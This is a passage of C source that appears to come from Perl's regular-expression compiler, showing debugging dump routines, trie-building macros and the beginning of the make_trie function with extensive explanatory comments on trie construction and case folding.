#define TRIE_LIST_ITEM(state,idx) (trie->states[state].trans.list)[ idx ]
#define TRIE_LIST_CUR(state) ( TRIE_LIST_ITEM( state, 0 ).forid )
#define TRIE_LIST_LEN(state) ( TRIE_LIST_ITEM( state, 0 ).newstate )
#define TRIE_LIST_USED(idx) ( trie->states[state].trans.list \
? (TRIE_LIST_CUR( idx ) - 1) \
: 0 )
#ifdef DEBUGGING
/*
dump_trie(trie,widecharmap,revcharmap)
dump_trie_interim_list(trie,widecharmap,revcharmap,next_alloc)
dump_trie_interim_table(trie,widecharmap,revcharmap,next_alloc)
These routines dump out a trie in a somewhat readable format.
The _interim_ variants are used for debugging the interim
tables that are used to generate the final compressed
representation which is what dump_trie expects.
Part of the reason for their existence is to provide a form
of documentation as to how the different representations function.
*/
/*
Dumps the final compressed table form of the trie to Perl_debug_log.
Used for debugging make_trie().
*/
STATIC void
S_dump_trie(pTHX_ const struct _reg_trie_data *trie, HV *widecharmap,
AV *revcharmap, U32 depth)
{
U32 state;
SV *sv=sv_newmortal();
int colwidth= widecharmap ? 6 : 4;
U16 word;
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_DUMP_TRIE;
Perl_re_indentf( aTHX_ "Char : %-6s%-6s%-4s ",
depth+1, "Match","Base","Ofs" );
for( state = 0 ; state < trie->uniquecharcount ; state++ ) {
SV ** const tmp = av_fetch( revcharmap, state, 0);
if ( tmp ) {
Perl_re_printf( aTHX_ "%*s",
colwidth,
pv_pretty(sv, SvPV_nolen_const(*tmp), SvCUR(*tmp), colwidth,
PL_colors[0], PL_colors[1],
(SvUTF8(*tmp) ? PERL_PV_ESCAPE_UNI : 0) |
PERL_PV_ESCAPE_FIRSTCHAR
)
);
}
}
Perl_re_printf( aTHX_ "\n");
Perl_re_indentf( aTHX_ "State|-----------------------", depth+1);
for( state = 0 ; state < trie->uniquecharcount ; state++ )
Perl_re_printf( aTHX_ "%.*s", colwidth, "--------");
Perl_re_printf( aTHX_ "\n");
for( state = 1 ; state < trie->statecount ; state++ ) {
const U32 base = trie->states[ state ].trans.base;
Perl_re_indentf( aTHX_ "#%4" UVXf "|", depth+1, (UV)state);
if ( trie->states[ state ].wordnum ) {
Perl_re_printf( aTHX_ " W%4X", trie->states[ state ].wordnum );
} else {
Perl_re_printf( aTHX_ "%6s", "" );
}
Perl_re_printf( aTHX_ " @%4" UVXf " ", (UV)base );
if ( base ) {
U32 ofs = 0;
while( ( base + ofs < trie->uniquecharcount ) ||
( base + ofs - trie->uniquecharcount < trie->lasttrans
&& trie->trans[ base + ofs - trie->uniquecharcount ].check
!= state))
ofs++;
Perl_re_printf( aTHX_ "+%2" UVXf "[ ", (UV)ofs);
for ( ofs = 0 ; ofs < trie->uniquecharcount ; ofs++ ) {
if ( ( base + ofs >= trie->uniquecharcount )
&& ( base + ofs - trie->uniquecharcount
< trie->lasttrans )
&& trie->trans[ base + ofs
- trie->uniquecharcount ].check == state )
{
Perl_re_printf( aTHX_ "%*" UVXf, colwidth,
(UV)trie->trans[ base + ofs - trie->uniquecharcount ].next
);
} else {
Perl_re_printf( aTHX_ "%*s", colwidth," ." );
}
}
Perl_re_printf( aTHX_ "]");
}
Perl_re_printf( aTHX_ "\n" );
}
Perl_re_indentf( aTHX_ "word_info N:(prev,len)=",
depth);
for (word=1; word <= trie->wordcount; word++) {
Perl_re_printf( aTHX_ " %d:(%d,%d)",
(int)word, (int)(trie->wordinfo[word].prev),
(int)(trie->wordinfo[word].len));
}
Perl_re_printf( aTHX_ "\n" );
}
/*
Dumps a fully constructed but uncompressed trie in list form.
List tries normally only are used for construction when the number of
possible chars (trie->uniquecharcount) is very high.
Used for debugging make_trie().
*/
STATIC void
S_dump_trie_interim_list(pTHX_ const struct _reg_trie_data *trie,
HV *widecharmap, AV *revcharmap, U32 next_alloc,
U32 depth)
{
U32 state;
SV *sv=sv_newmortal();
int colwidth= widecharmap ? 6 : 4;
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_DUMP_TRIE_INTERIM_LIST;
/* print out the table precompression. */
Perl_re_indentf( aTHX_ "State :Word | Transition Data\n",
depth+1 );
Perl_re_indentf( aTHX_ "%s",
depth+1, "------:-----+-----------------\n" );
for( state=1 ; state < next_alloc ; state ++ ) {
U16 charid;
Perl_re_indentf( aTHX_ " %4" UVXf " :",
depth+1, (UV)state );
if ( ! trie->states[ state ].wordnum ) {
Perl_re_printf( aTHX_ "%5s| ","");
} else {
Perl_re_printf( aTHX_ "W%4x| ",
trie->states[ state ].wordnum
);
}
for( charid = 1 ; charid <= TRIE_LIST_USED( state ) ; charid++ ) {
SV ** const tmp = av_fetch( revcharmap,
TRIE_LIST_ITEM(state, charid).forid, 0);
if ( tmp ) {
Perl_re_printf( aTHX_ "%*s:%3X=%4" UVXf " | ",
colwidth,
pv_pretty(sv, SvPV_nolen_const(*tmp), SvCUR(*tmp),
colwidth,
PL_colors[0], PL_colors[1],
(SvUTF8(*tmp) ? PERL_PV_ESCAPE_UNI : 0)
| PERL_PV_ESCAPE_FIRSTCHAR
) ,
TRIE_LIST_ITEM(state, charid).forid,
(UV)TRIE_LIST_ITEM(state, charid).newstate
);
if (!(charid % 10))
Perl_re_printf( aTHX_ "\n%*s| ",
(int)((depth * 2) + 14), "");
}
}
Perl_re_printf( aTHX_ "\n");
}
}
/*
Dumps a fully constructed but uncompressed trie in table form.
This is the normal DFA style state transition table, with a few
twists to facilitate compression later.
Used for debugging make_trie().
*/
STATIC void
S_dump_trie_interim_table(pTHX_ const struct _reg_trie_data *trie,
HV *widecharmap, AV *revcharmap, U32 next_alloc,
U32 depth)
{
U32 state;
U16 charid;
SV *sv=sv_newmortal();
int colwidth= widecharmap ? 6 : 4;
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_DUMP_TRIE_INTERIM_TABLE;
/*
print out the table precompression so that we can do a visual check
that they are identical.
*/
Perl_re_indentf( aTHX_ "Char : ", depth+1 );
for( charid = 0 ; charid < trie->uniquecharcount ; charid++ ) {
SV ** const tmp = av_fetch( revcharmap, charid, 0);
if ( tmp ) {
Perl_re_printf( aTHX_ "%*s",
colwidth,
pv_pretty(sv, SvPV_nolen_const(*tmp), SvCUR(*tmp), colwidth,
PL_colors[0], PL_colors[1],
(SvUTF8(*tmp) ? PERL_PV_ESCAPE_UNI : 0) |
PERL_PV_ESCAPE_FIRSTCHAR
)
);
}
}
Perl_re_printf( aTHX_ "\n");
Perl_re_indentf( aTHX_ "State+-", depth+1 );
for( charid=0 ; charid < trie->uniquecharcount ; charid++ ) {
Perl_re_printf( aTHX_ "%.*s", colwidth,"--------");
}
Perl_re_printf( aTHX_ "\n" );
for( state=1 ; state < next_alloc ; state += trie->uniquecharcount ) {
Perl_re_indentf( aTHX_ "%4" UVXf " : ",
depth+1,
(UV)TRIE_NODENUM( state ) );
for( charid = 0 ; charid < trie->uniquecharcount ; charid++ ) {
UV v=(UV)SAFE_TRIE_NODENUM( trie->trans[ state + charid ].next );
if (v)
Perl_re_printf( aTHX_ "%*" UVXf, colwidth, v );
else
Perl_re_printf( aTHX_ "%*s", colwidth, "." );
}
if ( ! trie->states[ TRIE_NODENUM( state ) ].wordnum ) {
Perl_re_printf( aTHX_ " (%4" UVXf ")\n",
(UV)trie->trans[ state ].check );
} else {
Perl_re_printf( aTHX_ " (%4" UVXf ") W%4X\n",
(UV)trie->trans[ state ].check,
trie->states[ TRIE_NODENUM( state ) ].wordnum );
}
}
}
#endif
/* make_trie(startbranch,first,last,tail,word_count,flags,depth)
startbranch: the first branch in the whole branch sequence
first : start branch of sequence of branch-exact nodes.
May be the same as startbranch
last : Thing following the last branch.
May be the same as tail.
tail : item following the branch sequence
count : words in the sequence
flags : currently the OP() type we will be building one of /EXACT(|F|FA|FU|FU_SS|L|FLU8)/
depth : indent depth
Inplace optimizes a sequence of 2 or more Branch-Exact nodes into a TRIE node.
A trie is an N'ary tree where the branches are determined by digital
decomposition of the key. IE, at the root node you look up the 1st character and
follow that branch repeat until you find the end of the branches. Nodes can be
marked as "accepting" meaning they represent a complete word. Eg:
/he|she|his|hers/
would convert into the following structure. Numbers represent states, letters
following numbers represent valid transitions on the letter from that state, if
the number is in square brackets it represents an accepting state, otherwise it
will be in parenthesis.
+-h->+-e->[3]-+-r->(8)-+-s->[9]
| |
| (2)
| |
(1) +-i->(6)-+-s->[7]
|
+-s->(3)-+-h->(4)-+-e->[5]
Accept Word Mapping: 3=>1 (he),5=>2 (she), 7=>3 (his), 9=>4 (hers)
This shows that when matching against the string 'hers' we will begin at state 1
read 'h' and move to state 2, read 'e' and move to state 3 which is accepting,
then read 'r' and go to state 8 followed by 's' which takes us to state 9 which
is also accepting. Thus we know that we can match both 'he' and 'hers' with a
single traverse. We store a mapping from accepting to state to which word was
matched, and then when we have multiple possibilities we try to complete the
rest of the regex in the order in which they occurred in the alternation.
The only prior NFA like behaviour that would be changed by the TRIE support is
the silent ignoring of duplicate alternations which are of the form:
/ (DUPE|DUPE) X? (?{ ... }) Y /x
Thus EVAL blocks following a trie may be called a different number of times with
and without the optimisation. With the optimisations dupes will be silently
ignored. This inconsistent behaviour of EVAL type nodes is well established as
the following demonstrates:
'words'=~/(word|word|word)(?{ print $1 })[xyz]/
which prints out 'word' three times, but
'words'=~/(word|word|word)(?{ print $1 })S/
which doesnt print it out at all. This is due to other optimisations kicking in.
Example of what happens on a structural level:
The regexp /(ac|ad|ab)+/ will produce the following debug output:
1: CURLYM[1] {1,32767}(18)
5: BRANCH(8)
6: EXACT <ac>(16)
8: BRANCH(11)
9: EXACT <ad>(16)
11: BRANCH(14)
12: EXACT <ab>(16)
16: SUCCEED(0)
17: NOTHING(18)
18: END(0)
This would be optimizable with startbranch=5, first=5, last=16, tail=16
and should turn into:
1: CURLYM[1] {1,32767}(18)
5: TRIE(16)
[Words:3 Chars Stored:6 Unique Chars:4 States:5 NCP:1]
<ac>
<ad>
<ab>
16: SUCCEED(0)
17: NOTHING(18)
18: END(0)
Cases where tail != last would be like /(?foo|bar)baz/:
1: BRANCH(4)
2: EXACT <foo>(8)
4: BRANCH(7)
5: EXACT <bar>(8)
7: TAIL(8)
8: EXACT <baz>(10)
10: END(0)
which would be optimizable with startbranch=1, first=1, last=7, tail=8
and would end up looking like:
1: TRIE(8)
[Words:2 Chars Stored:6 Unique Chars:5 States:7 NCP:1]
<foo>
<bar>
7: TAIL(8)
8: EXACT <baz>(10)
10: END(0)
d = uvchr_to_utf8_flags(d, uv, 0);
is the recommended Unicode-aware way of saying
*(d++) = uv;
*/
#define TRIE_STORE_REVCHAR(val) \
STMT_START { \
if (UTF) { \
SV *zlopp = newSV(UTF8_MAXBYTES); \
unsigned char *flrbbbbb = (unsigned char *) SvPVX(zlopp); \
unsigned const char *const kapow = uvchr_to_utf8(flrbbbbb, val); \
SvCUR_set(zlopp, kapow - flrbbbbb); \
SvPOK_on(zlopp); \
SvUTF8_on(zlopp); \
av_push(revcharmap, zlopp); \
} else { \
char ooooff = (char)val; \
av_push(revcharmap, newSVpvn(&ooooff, 1)); \
} \
} STMT_END
/* This gets the next character from the input, folding it if not already
* folded. */
#define TRIE_READ_CHAR STMT_START { \
wordlen++; \
if ( UTF ) { \
/* if it is UTF then it is either already folded, or does not need \
* folding */ \
uvc = valid_utf8_to_uvchr( (const U8*) uc, &len); \
} \
else if (folder == PL_fold_latin1) { \
/* This folder implies Unicode rules, which in the range expressible \
* by not UTF is the lower case, with the two exceptions, one of \
* which should have been taken care of before calling this */ \
assert(*uc != LATIN_SMALL_LETTER_SHARP_S); \
uvc = toLOWER_L1(*uc); \
if (UNLIKELY(uvc == MICRO_SIGN)) uvc = GREEK_SMALL_LETTER_MU; \
len = 1; \
} else { \
/* raw data, will be folded later if needed */ \
uvc = (U32)*uc; \
len = 1; \
} \
} STMT_END
#define TRIE_LIST_PUSH(state,fid,ns) STMT_START { \
if ( TRIE_LIST_CUR( state ) >=TRIE_LIST_LEN( state ) ) { \
U32 ging = TRIE_LIST_LEN( state ) * 2; \
Renew( trie->states[ state ].trans.list, ging, reg_trie_trans_le ); \
TRIE_LIST_LEN( state ) = ging; \
} \
TRIE_LIST_ITEM( state, TRIE_LIST_CUR( state ) ).forid = fid; \
TRIE_LIST_ITEM( state, TRIE_LIST_CUR( state ) ).newstate = ns; \
TRIE_LIST_CUR( state )++; \
} STMT_END
#define TRIE_LIST_NEW(state) STMT_START { \
Newx( trie->states[ state ].trans.list, \
4, reg_trie_trans_le ); \
TRIE_LIST_CUR( state ) = 1; \
TRIE_LIST_LEN( state ) = 4; \
} STMT_END
#define TRIE_HANDLE_WORD(state) STMT_START { \
U16 dupe= trie->states[ state ].wordnum; \
regnode * const noper_next = regnext( noper ); \
\
DEBUG_r({ \
/* store the word for dumping */ \
SV* tmp; \
if (OP(noper) != NOTHING) \
tmp = newSVpvn_utf8(STRING(noper), STR_LEN(noper), UTF); \
else \
tmp = newSVpvn_utf8( "", 0, UTF ); \
av_push( trie_words, tmp ); \
}); \
\
curword++; \
trie->wordinfo[curword].prev = 0; \
trie->wordinfo[curword].len = wordlen; \
trie->wordinfo[curword].accept = state; \
\
if ( noper_next < tail ) { \
if (!trie->jump) \
trie->jump = (U16 *) PerlMemShared_calloc( word_count + 1, \
sizeof(U16) ); \
trie->jump[curword] = (U16)(noper_next - convert); \
if (!jumper) \
jumper = noper_next; \
if (!nextbranch) \
nextbranch= regnext(cur); \
} \
\
if ( dupe ) { \
/* It's a dupe. Pre-insert into the wordinfo[].prev */\
/* chain, so that when the bits of chain are later */\
/* linked together, the dups appear in the chain */\
trie->wordinfo[curword].prev = trie->wordinfo[dupe].prev; \
trie->wordinfo[dupe].prev = curword; \
} else { \
/* we haven't inserted this word yet. */ \
trie->states[ state ].wordnum = curword; \
} \
} STMT_END
#define TRIE_TRANS_STATE(state,base,ucharcount,charid,special) \
( ( base + charid >= ucharcount \
&& base + charid < ubound \
&& state == trie->trans[ base - ucharcount + charid ].check \
&& trie->trans[ base - ucharcount + charid ].next ) \
? trie->trans[ base - ucharcount + charid ].next \
: ( state==1 ? special : 0 ) \
)
#define TRIE_BITMAP_SET_FOLDED(trie, uvc, folder) \
STMT_START { \
TRIE_BITMAP_SET(trie, uvc); \
/* store the folded codepoint */ \
if ( folder ) \
TRIE_BITMAP_SET(trie, folder[(U8) uvc ]); \
\
if ( !UTF ) { \
/* store first byte of utf8 representation of */ \
/* variant codepoints */ \
if (! UVCHR_IS_INVARIANT(uvc)) { \
TRIE_BITMAP_SET(trie, UTF8_TWO_BYTE_HI(uvc)); \
} \
} \
} STMT_END
#define MADE_TRIE 1
#define MADE_JUMP_TRIE 2
#define MADE_EXACT_TRIE 4
STATIC I32
S_make_trie(pTHX_ RExC_state_t *pRExC_state, regnode *startbranch,
regnode *first, regnode *last, regnode *tail,
U32 word_count, U32 flags, U32 depth)
{
/* first pass, loop through and scan words */
reg_trie_data *trie;
HV *widecharmap = NULL;
AV *revcharmap = newAV();
regnode *cur;
STRLEN len = 0;
UV uvc = 0;
U16 curword = 0;
U32 next_alloc = 0;
regnode *jumper = NULL;
regnode *nextbranch = NULL;
regnode *convert = NULL;
U32 *prev_states; /* temp array mapping each state to previous one */
/* we just use folder as a flag in utf8 */
const U8 * folder = NULL;
/* in the below add_data call we are storing either 'tu' or 'tuaa'
* which stands for one trie structure, one hash, optionally followed
* by two arrays */
#ifdef DEBUGGING
const U32 data_slot = add_data( pRExC_state, STR_WITH_LEN("tuaa"));
AV *trie_words = NULL;
/* along with revcharmap, this only used during construction but both are
* useful during debugging so we store them in the struct when debugging.
*/
#else
const U32 data_slot = add_data( pRExC_state, STR_WITH_LEN("tu"));
STRLEN trie_charcount=0;
#endif
SV *re_trie_maxbuff;
GET_RE_DEBUG_FLAGS_DECL;
PERL_ARGS_ASSERT_MAKE_TRIE;
#ifndef DEBUGGING
PERL_UNUSED_ARG(depth);
#endif
switch (flags) {
case EXACT: case EXACT_ONLY8: case EXACTL: break;
case EXACTFAA:
case EXACTFUP:
case EXACTFU:
case EXACTFLU8: folder = PL_fold_latin1; break;
case EXACTF: folder = PL_fold; break;
default: Perl_croak( aTHX_ "panic! In trie construction, unknown node type %u %s", (unsigned) flags, PL_reg_name[flags] );
}
trie = (reg_trie_data *) PerlMemShared_calloc( 1, sizeof(reg_trie_data) );
trie->refcount = 1;
trie->startstate = 1;
trie->wordcount = word_count;
RExC_rxi->data->data[ data_slot ] = (void*)trie;
trie->charmap = (U16 *) PerlMemShared_calloc( 256, sizeof(U16) );
if (flags == EXACT || flags == EXACT_ONLY8 || flags == EXACTL)
trie->bitmap = (char *) PerlMemShared_calloc( ANYOF_BITMAP_SIZE, 1 );
trie->wordinfo = (reg_trie_wordinfo *) PerlMemShared_calloc(
trie->wordcount+1, sizeof(reg_trie_wordinfo));
DEBUG_r({
trie_words = newAV();
});
re_trie_maxbuff = get_sv(RE_TRIE_MAXBUF_NAME, GV_ADD);
assert(re_trie_maxbuff);
if (!SvIOK(re_trie_maxbuff)) {
sv_setiv(re_trie_maxbuff, RE_TRIE_MAXBUF_INIT);
}
DEBUG_TRIE_COMPILE_r({
Perl_re_indentf( aTHX_
"make_trie start==%d, first==%d, last==%d, tail==%d depth=%d\n",
depth+1,
REG_NODE_NUM(startbranch), REG_NODE_NUM(first),
REG_NODE_NUM(last), REG_NODE_NUM(tail), (int)depth);
});
/* Find the node we are going to overwrite */
if ( first == startbranch && OP( last ) != BRANCH ) {
/* whole branch chain */
convert = first;
} else {
/* branch sub-chain */
convert = NEXTOPER( first );
}
/* -- First loop and Setup --
We first traverse the branches and scan each word to determine if it
contains widechars, and how many unique chars there are, this is
important as we have to build a table with at least as many columns as we
have unique chars.
We use an array of integers to represent the character codes 0..255
(trie->charmap) and we use a an HV* to store Unicode characters. We use
the native representation of the character value as the key and IV's for
the coded index.
*TODO* If we keep track of how many times each character is used we can
remap the columns so that the table compression later on is more
efficient in terms of memory by ensuring the most common value is in the
middle and the least common are on the outside. IMO this would be better
than a most to least common mapping as theres a decent chance the most
common letter will share a node with the least common, meaning the node
will not be compressible. With a middle is most common approach the worst
case is when we have the least common nodes twice.
*/
for ( cur = first ; cur < last ; cur = regnext( cur ) ) {
regnode *noper = NEXTOPER( cur );
const U8 *uc;
const U8 *e;
int foldlen = 0;
U32 wordlen = 0; /* required init */
STRLEN minchars = 0;
STRLEN maxchars = 0;
bool set_bit = trie->bitmap ? 1 : 0; /*store the first char in the
bitmap?*/
if (OP(noper) == NOTHING) {
/* skip past a NOTHING at the start of an alternation
* eg, /(?:)a|(?:b)/ should be the same as /a|b/
*
* If the next node is not something we are supposed to process
* we will just ignore it due to the condition guarding the
* next block.
*/
regnode *noper_next= regnext(noper);
if (noper_next < tail)
noper= noper_next;
}
if ( noper < tail
&& ( OP(noper) == flags
|| (flags == EXACT && OP(noper) == EXACT_ONLY8)
|| (flags == EXACTFU && ( OP(noper) == EXACTFU_ONLY8
|| OP(noper) == EXACTFUP))))
{
uc= (U8*)STRING(noper);
e= uc + STR_LEN(noper);
} else {
trie->minlen= 0;
continue;
}
if ( set_bit ) { /* bitmap only alloced when !(UTF&&Folding) */
TRIE_BITMAP_SET(trie,*uc); /* store the raw first byte
regardless of encoding */
if (OP( noper ) == EXACTFUP) {
/* false positives are ok, so just set this */
TRIE_BITMAP_SET(trie, LATIN_SMALL_LETTER_SHARP_S);
}
}
for ( ; uc < e ; uc += len ) { /* Look at each char in the current
branch */
TRIE_CHARCOUNT(trie)++;
TRIE_READ_CHAR;
/* TRIE_READ_CHAR returns the current character, or its fold if /i
* is in effect. Under /i, this character can match itself, or
* anything that folds to it. If not under /i, it can match just
* itself. Most folds are 1-1, for example k, K, and KELVIN SIGN
* all fold to k, and all are single characters. But some folds
* expand to more than one character, so for example LATIN SMALL
* LIGATURE FFI folds to the three character sequence 'ffi'. If
* the string beginning at 'uc' is 'ffi', it could be matched by
* three characters, or just by the one ligature character. (It
* could also be matched by two characters: LATIN SMALL LIGATURE FF
* followed by 'i', or by 'f' followed by LATIN SMALL LIGATURE FI).
* (Of course 'I' and/or 'F' instead of 'i' and 'f' can also
* match.) The trie needs to know the minimum and maximum number
* of characters that could match so that it can use size alone to
* quickly reject many match attempts. The max is simple: it is
* the number of folded characters in this branch (since a fold is
* never shorter than what folds to it. */
maxchars++;
/* And the min is equal to the max if not under /i (indicated by
* 'folder' being NULL), or there are no multi-character folds. If
* there is a multi-character fold, the min is incremented just
* once, for the character that folds to the sequence. Each
* character in the sequence needs to be added to the list below of
* characters in the trie, but we count only the first towards the
* min number of characters needed. This is done through the
* variable 'foldlen', which is returned by the macros that look
* for these sequences as the number of bytes the sequence
* occupies. Each time through the loop, we decrement 'foldlen' by
* how many bytes the current char occupies. Only when it reaches
* 0 do we increment 'minchars' or look for another multi-character
* sequence. */
if (folder == NULL) {
minchars++;
}
else if (foldlen > 0) {
foldlen -= (UTF) ? UTF8SKIP(uc) : 1;
}
else {
minchars++;
/* See if *uc is the beginning of a multi-character fold. If
* so, we decrement the length remaining to look at, to account
* for the current character this iteration. (We can use 'uc'
* instead of the fold returned by TRIE_READ_CHAR because for
* non-UTF, the latin1_safe macro is smart enough to account
* for all the unfolded characters, and because for UTF, the
* string will already have been folded earlier in the
* compilation process */
if (UTF) {
if ((foldlen = is_MULTI_CHAR_FOLD_utf8_safe(uc, e))) {
foldlen -= UTF8SKIP(uc);
}
}
else if ((foldlen = is_MULTI_CHAR_FOLD_latin1_safe(uc, e))) {
foldlen--;
}
}
/* The current character (and any potential folds) should be added
* to the possible matching characters for this position in this
* branch */
if ( uvc < 256 ) {
if ( folder ) {
U8 folded= folder[ (U8) uvc ];
if ( !trie->charmap[ folded ] ) {
trie->charmap[ folded ]=( ++trie->uniquecharcount );
TRIE_STORE_REVCHAR( folded );
}
}
if ( !trie->charmap[ uvc ] ) {
trie->charmap[ uvc ]=( ++trie->uniquecharcount );
TRIE_STORE_REVCHAR( uvc );
}
if ( set_bit ) {
/* store the codepoint in the bitmap, and its folded
* equivalent. */
TRIE_BITMAP_SET_FOLDED(trie, uvc, folder);
set_bit = 0; /* We've done our bit :-) */
}
} else {
/* XXX We could come up with the list of code points that fold
* to this using PL_utf8_foldclosures, except not for
* multi-char folds, as there may be multiple combinations
* there that could work, which needs to wait until runtime to
* resolve (The comment about LIGATURE FFI above is such an
* example */
SV** svpp;
if ( !widecharmap )
widecharmap = newHV();
svpp = hv_fetch( widecharmap, (char*)&uvc, sizeof( UV ), 1 );
if ( !svpp )
Perl_croak( aTHX_ "error creating/fetching widecharmap entry for 0x%" UVXf, uvc );
if ( !SvTRUE( *svpp ) ) {
sv_setiv( *svpp, ++trie->uniquecharcount );
TRIE_STORE_REVCHAR(uvc);
}
}
} /* end loop through characters in this branch of the trie */
/* We take the min and max for this branch and combine to find the min
* and max for all branches processed so far */
if( cur == first ) {
trie->minlen = minchars;
trie->maxlen = maxchars;
} else if (minchars < trie->minlen) {
trie->minlen = minchars;
} else if (maxchars > trie->maxlen) {
trie->maxlen = maxchars;
}
} /* end first pass */
DEBUG_TRIE_COMPILE_r(
Perl_re_indentf( aTHX_
"TRIE(%s): W:%d C:%d Uq:%d Min:%d Max:%d\n",
depth+1,
( widecharmap ? "UTF8" : "NATIVE" ), (int)word_count,
(int)TRIE_CHARCOUNT(trie), trie->uniquecharcount,
(int)trie->minlen, (int)trie->maxlen )
);
/*
We now know what we are dealing with in terms of unique chars and
string sizes so we can calculate how much memory a naive
representation using a flat table will take. If it's over a reasonable
limit (as specified by ${^RE_TRIE_MAXBUF}) we use a more memory
conservative but potentially much slower representation using an array
of lists.
At the end we convert both representations into the same compressed
form that will be used in regexec.c for matching with. The latter
is a form that cannot be used to construct with but has memory
properties similar to the list form and access properties similar
to the table form making it both suitable for fast searches and
small enough that its feasable to store for the duration of a program.
See the comment in the code where the compressed table is produced
inplace from the flat tabe representation for an explanation of how
the compression works.
*/
Newx(prev_states, TRIE_CHARCOUNT(trie) + 2, U32);
prev_states[1] = 0;
if ( (IV)( ( TRIE_CHARCOUNT(trie) + 1 ) * trie->uniquecharcount + 1)
> SvIV(re_trie_maxbuff) )
{
/*
Second Pass -- Array Of Lists Representation
Each state will be represented by a list of charid:state records
(reg_trie_trans_le) the first such element holds the CUR and LEN
points of the allocated array. (See defines above).
We build the initial structure using the lists, and then convert
it into the compressed table form which allows faster lookups
(but cant be modified once converted).
*/
STRLEN transcount = 1;
DEBUG_TRIE_COMPILE_MORE_r( Perl_re_indentf( aTHX_ "Compiling trie using list compiler\n",
depth+1));
trie->states = (reg_trie_state *)
PerlMemShared_calloc( TRIE_CHARCOUNT(trie) + 2,
sizeof(reg_trie_state) );
TRIE_LIST_NEW(1);
next_alloc = 2;
for ( cur = first ; cur < last ; cur = regnext( cur ) ) {
regnode *noper = NEXTOPER( cur );
U32 state = 1; /* required init */
U16 charid = 0; /* sanity init */
U32 wordlen = 0; /* required init */
if (OP(noper) == NOTHING) {
regnode *noper_next= regnext(noper);
if (noper_next < tail)
noper= noper_next;
/* we will undo this assignment if noper does not
* point at a trieable type in the else clause of
* the following statement. */
}
if ( noper < tail
&& ( OP(noper) == flags
|| (flags == EXACT && OP(noper) == EXACT_ONLY8)
|| (flags == EXACTFU && ( OP(noper) == EXACTFU_ONLY8
|| OP(noper) == EXACTFUP))))
{
const U8 *uc= (U8*)STRING(noper);
const U8 *e= uc + STR_LEN(noper);
for ( ; uc < e ; uc += len ) {
TRIE_READ_CHAR;
if ( uvc < 256 ) {
charid = trie->charmap[ uvc ];
} else {
SV** const svpp = hv_fetch( widecharmap,
(char*)&uvc,
sizeof( UV ),
0);
if ( !svpp ) {
charid = 0;
} else {
charid=(U16)SvIV( *svpp );
}
}
/* charid is now 0 if we dont know the char read, or
* nonzero if we do */
if ( charid ) {
U16 check;
U32 newstate = 0;
charid--;
if ( !trie->states[ state ].trans.list ) {
TRIE_LIST_NEW( state );
}
for ( check = 1;
check <= TRIE_LIST_USED( state );
check++ )
{
if ( TRIE_LIST_ITEM( state, check ).forid
== charid )
{
newstate = TRIE_LIST_ITEM( state, check ).newstate;
break;
}
}
if ( ! newstate ) {
newstate = next_alloc++;
prev_states[newstate] = state;
TRIE_LIST_PUSH( state, charid, newstate );
transcount++;
}
state = newstate;
} else {
Perl_croak( aTHX_ "panic! In trie construction, no char mapping for %" IVdf, uvc );
}
}
} else {
/* If we end up here it is because we skipped past a NOTHING, but did not end up
* on a trieable type. So we need to reset noper back to point at the first regop
* in the branch before we call TRIE_HANDLE_WORD()
*/
noper= NEXTOPER(cur);
}
TRIE_HANDLE_WORD(state);
} /* end second pass */
/* next alloc is the NEXT state to be allocated */
trie->statecount = next_alloc;
trie->states = (reg_trie_state *)
PerlMemShared_realloc( trie->states,
next_alloc
* sizeof(reg_trie_state) );
/* and now dump it out before we compress it */
DEBUG_TRIE_COMPILE_MORE_r(dump_trie_interim_list(trie, widecharmap,
revcharmap, next_alloc,
depth+1)
);
trie->trans = (reg_trie_trans *)
PerlMemShared_calloc( transcount, sizeof(reg_trie_trans) );
{
U32 state;
U32 tp = 0;
U32 zp = 0;
for( state=1 ; state < next_alloc ; state ++ ) {
U32 base=0;
/*
DEBUG_TRIE_COMPILE_MORE_r(
Perl_re_printf( aTHX_ "tp: %d zp: %d ",tp,zp)
);
*/
if (trie->states[state].trans.list) {
U16 minid=TRIE_LIST_ITEM( state, 1).forid;
U16 maxid=minid;
U16 idx;
for( idx = 2 ; idx <= TRIE_LIST_USED( state ) ; idx++ ) {
const U16 forid = TRIE_LIST_ITEM( state, idx).forid;
if ( forid < minid ) {
minid=forid;
} else if ( forid > maxid ) {
maxid=forid;
}
}
if ( transcount < tp + maxid - minid + 1) {
transcount *= 2;
trie->trans = (reg_trie_trans *)
PerlMemShared_realloc( trie->trans,
transcount
* sizeof(reg_trie_trans) );
Zero( trie->trans + (transcount / 2),
transcount / 2,
reg_trie_trans );
}
base = trie->uniquecharcount + tp - minid;
if ( maxid == minid ) {
U32 set = 0;
for ( ; zp < tp ; zp++ ) {
if ( ! trie->trans[ zp ].next ) {
base = trie->uniquecharcount + zp - minid;
trie->trans[ zp ].next = TRIE_LIST_ITEM( state,
1).newstate;
trie->trans[ zp ].check = state;
set = 1;
break;
}
}
if ( !set ) {
trie->trans[ tp ].next = TRIE_LIST_ITEM( state,
1).newstate;
trie->trans[ tp ].check = state;
tp++;
zp = tp;
}
} else {
for ( idx=1; idx <= TRIE_LIST_USED( state ) ; idx++ ) {
const U32 tid = base
- trie->uniquecharcount
+ TRIE_LIST_ITEM( state, idx ).forid;
trie->trans[ tid ].next = TRIE_LIST_ITEM( state,
idx ).newstate;
trie->trans[ tid ].check = state;
}
tp += ( maxid - minid + 1 );
}
Safefree(trie->states[ state ].trans.list);
}
/*
DEBUG_TRIE_COMPILE_MORE_r(
Perl_re_printf( aTHX_ " base: %d\n",base);
);
*/
trie->states[ state ].trans.base=base;
}
trie->lasttrans = tp + 1;
}
} else {
/*
Second Pass -- Flat Table Representation.
we dont use the 0 slot of either trans[] or states[] so we add 1 to
each. We know that we will need Charcount+1 trans at most to store
the data (one row per char at worst case) So we preallocate both
structures assuming worst case.
We then construct the trie using only the .next slots of the entry
structs.
We use the .check field of the first entry of the node temporarily
to make compression both faster and easier by keeping track of how
many non zero fields are in the node.
Since trans are numbered from 1 any 0 pointer in the table is a FAIL
transition.
There are two terms at use here: state as a TRIE_NODEIDX() which is
a number representing the first entry of the node, and state as a
TRIE_NODENUM() which is the trans number. state 1 is TRIE_NODEIDX(1)
and TRIE_NODENUM(1), state 2 is TRIE_NODEIDX(2) and TRIE_NODENUM(3)
if there are 2 entrys per node. eg:
A B A B
1. 2 4 1. 3 7
